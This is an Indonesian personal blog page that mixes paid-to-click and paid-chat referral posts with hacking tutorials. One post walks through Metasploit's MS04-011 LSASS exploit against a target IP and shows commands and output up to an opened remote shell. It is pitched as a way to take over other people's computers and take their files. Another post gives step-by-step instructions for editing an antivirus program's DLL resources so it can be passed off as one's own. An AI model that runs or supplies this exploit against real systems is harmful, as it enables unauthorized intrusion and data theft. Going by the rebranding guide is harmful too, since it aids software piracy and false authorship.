Welcome To Aloen BloG

Di Birejji, Chatting dapet $$$

Diposting oleh Unknown | 23.52 | | 0 komentar »

 Hallo kawan Semua. sebelumnya saya ucapkan terimakasih kepada kawan-kawan ternakonlie yang sudah meluangkan waktunya untuk berkunjung ke blog ini. Mungkin diantara rekan-rekan ada yang kecewa karena blog ini isinya masih seperti itu aja. Mohon maklum karena akhir-akhir ini lagi banyak kerjaan. Jadi PTC dan blog nya terbengkalai.

Namun demikian sekarang saya mau berbagi tentang birejji yang merupakan saudaranya moezmoney. ada beberapa perbedaan antara birejji dan moezmoney yang saya cermati, diantaranya adalah:

  1. Dari tampilannya sedikit berbeda. kalo di moezmoney tempat chatting dibagi kedalam beberapa room, kalo di birejji dibagi dalam beberapa village.
  2. kalo di meozmoney kita dapat bayaran chatting di room manapun, namun di birejji hanya di kampung (village) kita saja.
  3. Bayarannya kalo di moezmoney setelah kita sampai 2 cent, sedang kan di birejji dibayarnya tiap akhir pekan. tepatnya lagi setiap hari Sabtu waktu Indonesia Barat.
  4. Loading di birejji lebih cepet, sehingga kita bisa lebih cepet dapat uangnya.
  5. dan ada beberapa perbedaan lainnya.
  6. secara keseluruhan birejji lebih enak dibanding moezmoney.
Tak lupa juga saya sertakan bukti pembayaran pertama saya dari birejji yang baru saya liat pagi ini hehehe
kalo mau daftar silahkan klik di sini atau copy/paste di http://birejji.com/index.php?key=24312
apa salahnya di coba mumpung gratis ya kan,,,,

Hijacking Program / Software

Diposting oleh Unknown | 08.09 | | 0 komentar »

Hijack…apaan tuh? Umh…sebenarnya banyak artinya, bukan hanya diartikan sebagai pembajakan tapi pembajakan banget…belum ngerti jugak… gini NIH…kalo bajak software kan hanya membajak softwarenya aja…tinggal minjem CD orang yang berisi master software tersebut, kemudian mengcopy dan menginstall di komputer kita. Kalau Hijacking belum sampai disitu ajah… kita dapat mengganti splash screen, nama antivirus itu dan nama copyright atau pembuat atau vendor dari antivirus tersebut. CARANYA MAS…CARANYA… owkay…simak aja cerita di bawah ini
Kali ini kita akan meng-hijack antivirus luar yak .. kali ini contohnya Norman Antivirus. Sebelumnya yang harus dipersiapkan adalah:
1. PE Explorer, donlot aja di internet, banyak kok, PE explorer ini adalah sebuah tools yang digunakan untuk mereverse engineering sebuah software, yaitu membongkar isi sebuah software. Bukan hanya membongkar tapi dapat mengganti atau mengedit gambar, tulisan atau label yang ada di software tersebut
2. Process Explorer untuk melihat program ini memakai file dependensi (.dll) apa agar kita dapat menghijack softwarenya
3.  Master Norman Anti Virus (boleh bajakan, boleh yang asli)
4. Cemilan, winamp, rokok n aer putih … ya buat iseng – iseng ajah …
Okay sekarang kita mulai peng-hijack-an inih…
1. Install Software Norman Antivirus, tau kan cara nginstall-nya, gak usah dijelasin toh.
2. Kemudian Restart Komputer Anda agar lebih keren (apa coba…)
3. Nah setelah restart jalankan process explorer
4. Kemudian jalankan salah satu program dari Norman AV tersebut, misalnya Configuration Editor, Task Editor atau Utilities.
5. Lalu Jalankan process explorer untuk melihat dll apa saja yang dipakai si Norman Antivirus ini untuk menjalankan programnya. Alasannya kenapa file dll yang harus dilihat? Karena dll tersebut adalah sebuah file yang berisi komponen-komponen seperti gambar, icon, tulisan, form dan lain – lain yang digunakan oleh Norman AV untuk menjalankan programnya. Okay let’s check the process explorer
6. Disini kita bisa melihat beberapa aplikasi yang kita jalankan dari Norman AV yaitu : Nvccf.exe, Nvcte.exe dan Nvcut.exe
7. Untuk melihat dll nya klik salah satu program yang disebutkan diatas tadi, misalnya Nvccf.exe:
8. Kemudian lihat kotak bagian bawah untuk meneliti file dll apa aja yang dipakai oleh proses Nvcff.exe, kliatan kan…kemudian coba catat:
Ada Nvccf0q.dll, Nvccf0p.dll, Nvccf0o.dll, dan lain – lain…banyak kan
9. Kemudian klik proses lainnya yaitu Nvcte.exe dan Nvcut.exe untuk mengetahui dll yang dipakai, kemudian catat.
10. Dari 3 program tersebut kita dapat melihat dll yang sama dan dipakai oleh ketiga program tersebut adalah user32.dll, shell32.dll, ole32.dll, oleaut32.dll, Noemrc.dll, Niphk.dll
11. Mari kita lakukan penelitian lagi untuk melihat dll apa saja yang akan kita hijack
12. Kita mulai dari user32.dll…umh kayaknya bukan deh … soalnya user32.dll itu file dll yang digunakan windows, okay … lewat, shell32.dll juga, ole32.dll, oleaut32.dll juga merupakan komponen dll dari windows…lewat semua, yang tersisa sekarang Noemrc.dll dan Niphk.dll.
13. Sekarang kita buka PE Explorer, kemudian cari file Niphk.dll berada, yaitu di %direktori dimana Norman ter-install%\Nvc\bin\
14. Kemudian kemudian tekan tombol Ctrl+R untuk melihat resource-nya
15. Di kotak sebelah kiri anda dapat melihat hanya ada komponen version aja… umh…kayaknya bukan deh…oke lanjut ke dll selanjutnya yaitu Noemrc.dll
16. Buka file Noemrc.dll tersebut memakai PE Explorer, kemudian tekan Ctrl+R seperti tadi, kemudian lihat kotak sebelah kiri
17. Ada beberapa komponen yaitu, bitmap, Icon Entry, String dan Group Icon.
18. Klik yang ada di Bitmap
19. Umh… ada 3 sub komponen gambar, mari kita lihat…BINGGO!!!ketemu…ketiga gambar tersebut adalah bitmap yang dipakai untuk menjalankan aplikasi Norman AV, ketiga gambar yang dimuat adalah :
20. Anda bisa lihat gambar di atas ini adalah yang dipakai oleh aplikasi norman. Coba aja lihat di aplikasi Norman AV yang ada:
21. Nah sekarang untuk menghijack Norman AV ini cukup buat gambar 3 buah, harus berekstensi jpg semua.
22. Kemudian buka file Noemrc.dll dan tekan Ctrl+R
23. Kemudian Klik salah satu komponen dari sub bitmap yang mempunyai caption 101, ganti gambarnya dengan gambar atau logo yang anda buat yaitu dengan menekan tombol Shift+Ctrl+E
24. Kemudian tekan Ctrl+O untuk mencari gambar baru yang digunakan untuk mengganti logo Norman AV.
25. Lakukan langkah seperti di atas untuk sub bitmap 102 dan 103.
26. Setelah itu simpan Noemrc.dll di direktori dimana Norman AV terinstall, misalnya Norman Av terinstall di C:\Norman, maka simpan Noemrc.dll yang baru di direktori C:\Norman\Bin\ dan di C:\Norman\Nvc\Bin\
27. Setelah itu jalankan Norman AV lagi.
28. Lihat perbedaan yang terjadi, seperti gambar di bawah:
29. Jelas bukan logo, gambar yang berdiri di samping kanan diganti sama gambar kita
30. Untuk lebih jelas anda bisa me-restart komputer dan melihat splash screen yang ada …
Nah itulah sekelumit tentang hijacking program atau software. Jadi untuk membajak jangan tanggung – tanggung, sekalian aja diganti semuanya…enak kan… mengakui software yang bukan buatan kita dengan mengatasnamakan program buatan sendiri sungguh mengasyikan bukan (KALAU TIDAK TAU MALU) … yah mo gimana,…sama seperti beberapa program freeware yang anda dibuat…sakitt banget kan kalau program tersebut diakui sebagai program buatan orang lain…bukan program buatan kita…SUDAH FREEWARE DI BAJAK PULA…HAHAHAHAHAHHA…yah…moga2 ilmu ini bermanfaat… okeh, terakhir semoga kita BUKAN termasuk orang – orang seperti ini, Bukan PEMBAJAK lagi namanya tapi PEMBAJAK BANGET…. Mau gitu??

Cara Menggunakan Metasploit

Diposting oleh Unknown | 08.05 | | 0 komentar »

Metasploit merupakan program yang sangat bagus untuk menguasai komputer orang lain lewat jaringan koneksi komputer.

Dengan metasploit kita bisa masuk dan mengambil apapun isi dari komputer target.PErnah jadi korban masalahnya...id sama password hilang tinggal pakai metasploit dan katanya lagi dengan metasploit kita juga bisa matiin komputer orang dr jarak jauh juga..Sebelumnya saya mohon maaf kalau topik aku ini kurang baik,atau udah basi,atau ngak jelas.

Sebelumnya makasih buat situs hackers-center.org untuk tutorialnya.

1.buka frameworknya
. trus masuk ke console (ctrl+o )

. liat smua exploit dengan perintah

msf > show exploits

2.load modul exploit (aku dikasih twnya suruh pake exploit lsass)

msf > use windows/smb/ms04_011_lsass

3.Tentukan sistem operasi target(nie contoh klo target pake xp)

msf exploit(ms04_011_lsass) > set target 2

target => 2

3.Tampilin payloadnya apa aja yg ada..

msf exploit(ms04_011_lsass) > show payloads

4. pilih payload generic/shell_bind_tcp

msf exploit(ms04_011_lsass) > set payload generic/shell_bind_tcp

payload => generic/shell_bind_tcp

5.tentuin ip target (misal ip nya xxxxxxxxxx)

msf exploit(ms04_011_lsass) > set RHOST xxxxxxxxxx
RHOST => xxxxxxxxxx

6.sekarang tinggal jalanin perintah exploit...

msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Command shell session 3 opened (192.168.113.25:8471 -> 192.168.113.14:4444)
[*] The DCERPC service did not reply to our request



7.Selanjutnya qta tampilin...isi session kita

msf exploit(ms04_011_lsass) > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
3 Command shell 192.168.113.25:8471 -> 192.168.113.14:4444

8. terus kita masuk ke session 3 tersebut, untuk masuk ke konsol....

msf exploit(ms04_011_lsass) > sessions -i 3

[*] Starting interaction with 3...

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

selesai.
oh ya kita tidak bisa masuk komputer target kalau tidak ada celahnya dan biar kita tahu komputer target ada celahnya atau tidak,kita scan dulu pakai nmmap. Maklum pelupa.nmmapnya dah ada di framework seri 3.1 berhubung aku punya nya yg seri 3.0 tidak ada nmmap nya ya maaf kalau tidak aku upload.

Klik disini untuK metasploit 3 GUI (Download)



ADMIN TIDAK BERTANGGUNG JAWAB ATAS KESALAHAN YANG TERJADI NANTINYA

nmap is a powerfull scanner available in Unix/Linux system. It’s very usefull for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine againts single hosts.
It’s very easy to install nmap in Ubuntu, just download from the internet.
taufanlubis@zyrex:~$ sudo apt-get install nmap

In this practice, I used 2 computer.
PC-01, IP = 192.168.0.3 (OpenSuse 10.1) with Kernel 2.6.16.13-4-default
PC-02, IP = 192.168.0.2 (Ubuntu Feisty)
I run nmap from Ubuntu to scan PC-01.

IP Scanning with range 192.168.0.0 – 192.168.0.255
taufanlubis@zyrex:~$ sudo nmap -sP 192.168.0.0/24
Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 21:51 WIT
Host 192.168.0.2 appears to be up.
caught SIGINT signal, cleaning up
taufanlubis@zyrex:~$

IP Scanning with range 192.168.0.1 – 192.168.0.254
taufanlubis@zyrex:~$ sudo nmap -sP 192.168.0.1-254
Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 21:53 WIT
Host 192.168.0.2 appears to be up.
Host 192.168.0.3 appears to be up.
MAC Address: 00:0D:88:B3:72:F3 (D-Link)
Nmap finished: 255 IP addresses (2 hosts up) scanned in 31.242 seconds
taufanlubis@zyrex:~$

Port Scanning with range port 100 – port 139
taufanlubis@zyrex:~$ nmap 192.168.0.3 -p100-139
Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 22:06 WIT
Interesting ports on 192.168.0.3:
Not shown: 38 filtered ports
PORT STATE SERVICE
113/tcp closed auth
139/tcp open netbios-ssn
Nmap finished: 1 IP address (1 host up) scanned in 24.914 seconds
taufanlubis@zyrex:~$
For 40 ports, it took almost 25 seconds, so it will take much longer if you want to scan from 1-65535 (all ports in a computers).

Scanning Operating system on target IP
taufanlubis@zyrex:~$ sudo nmap -O 192.168.0.3
Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 22:20 WIT
Interesting ports on 192.168.0.3:
Not shown: 1693 filtered ports
PORT STATE SERVICE
80/tcp open http
113/tcp closed auth
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0D:88:B3:72:F3 (D-Link)
Device type: general purpose|specialized|WAP|storage-misc
Running (JUST GUESSING) : Linux 2.6.X|2.4.X (97%), Atmel Linux 2.6.X (91%), Siemens linux (91%), Linksys Linux 2.4.X (89%), Asus Linux 2.4.X (89%), Maxtor Linux 2.4.X (89%), Inventel embedded (88%)
Aggressive OS guesses: Linux 2.6.13 – 2.6.18 (97%), Linux 2.6.11 – 2.6.15 (Ubuntu or Debian) (93%), Linux 2.6.14 – 2.6.17 (92%), Linux 2.6.17 – 2.6.18 (x86) (92%), Linux 2.6.17.9 (X86) (92%), Linux 2.6.15-27-686 (Ubuntu Dapper, X86) (92%), Linux 2.6.9-42.0.2.EL (RedHat Enterprise Linux) (92%), Linux 2.6.9 – 2.6.12 (x86) (92%), Atmel AVR32 STK1000 development board (runs Linux 2.6.16.11) (91%), Siemens Gigaset SE515dsl wireless broadband router (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 94.942 seconds
taufanlubis@zyrex:~$

nmap Faster Execution
If you want to make faster scan, use -T4 option on nmap command..
taufanlubis@zyrex:~$ sudo nmap -A -T4 192.168.0.3
Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 22:42 WIT
Interesting ports on 192.168.0.3:
Not shown: 1693 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.0 ((Linux/SUSE))
113/tcp closed auth
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: HOME)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: HOME)
MAC Address: 00:0D:88:B3:72:F3 (D-Link)
Device type: general purpose|WAP|specialized|storage-misc|broadband router
Running (JUST GUESSING) : Linux 2.6.X|2.4.X (97%), Siemens linux (93%), Atmel Linux 2.6.X (92%), Inventel embedded (89%), Linksys Linux 2.4.X (89%), Asus Linux 2.4.X (89%), Maxtor Linux 2.4.X (89%), Netgear embedded (87%)
Aggressive OS guesses: Linux 2.6.13 – 2.6.18 (97%), Siemens Gigaset SE515dsl wireless broadband router (93%), Linux 2.6.11 – 2.6.15 (Ubuntu or Debian) (93%), Linux 2.6.15-27-686 (Ubuntu Dapper, X86) (93%), Atmel AVR32 STK1000 development board (runs Linux 2.6.16.11) (92%), Linux 2.6.14 – 2.6.17 (92%), Linux 2.6.17 – 2.6.18 (x86) (92%), Linux 2.6.17.9 (X86) (92%), Linux 2.6.9-42.0.2.EL (RedHat Enterprise Linux) (92%), Linux 2.6.9 – 2.6.12 (x86) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 58.830 seconds
taufanlubis@zyrex:~$
Now, you only need 58,83 seconds compare to 94.94 seconds (without -T4 option).

For more details, just open the nmap manual.
taufanlubis@zyrex:~$ man nmap

Paid to Click(PTC)

Diposting oleh Unknown | 19.10 | | 0 komentar »

kalian tentu sudah pernah dengar yang namanya PTC kan,jika belum PTC(Pay per Click) adalah sebuah situs yang membayar setiap membernya setiap mengklik iklan yang tersedia.saya sudah mengikuti beberapa PTC dan sudah terbukti bahwa kita akan di bayar setelah mengikuti syarat dan ketentuan dari PTC tersebut,ini adalah beberapa PTC yang saya ikuti:

1.NeoBux


2.Onbux


 

3.Martabux



4.id-bux
 
 
5.gagabux
 

6.buxplax
 

7.Infinitybux



8.Globalinvestmentsbux



9.IENBUX
Sign up to IENBux today!

10.PaidToClick


11.Rodbux



12.MarihuanaBux



13.Networkerptc



14.Lasdmoney



15.BuxExcel






16.GladeBux
 

17.Fox Bux







18.cahview
href="http://www.cashviews.com/?ref=aloen76">


19.Donkey Mails
DonkeyMails.com: No Minimum Payout


20.Incrasebux
  


kalau kalian ingin mencoba caranya gampang kok,kalian hanya perlu mengklik baner PTC di atas,lalu register dan kalian sudah dapat mulai menghasilkan dolar dengan cara mengklik iklan yang ada di ptc tersebut.

Followers

Visitor

 

Aloen Pop. Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com